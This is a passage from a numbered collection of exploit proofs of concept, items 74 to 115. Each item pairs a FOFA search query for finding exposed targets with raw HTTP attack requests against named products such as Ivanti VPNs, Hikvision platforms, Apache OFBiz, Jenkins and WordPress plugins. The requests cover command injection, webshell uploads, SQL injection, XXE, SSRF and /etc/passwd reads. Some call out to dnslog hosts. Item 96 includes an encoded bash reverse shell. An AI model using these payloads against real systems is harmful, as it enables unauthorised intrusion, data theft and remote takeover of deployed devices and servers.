User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) 掌上校园 mobile campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it drops a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese Tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operation management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (QiAnXin) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
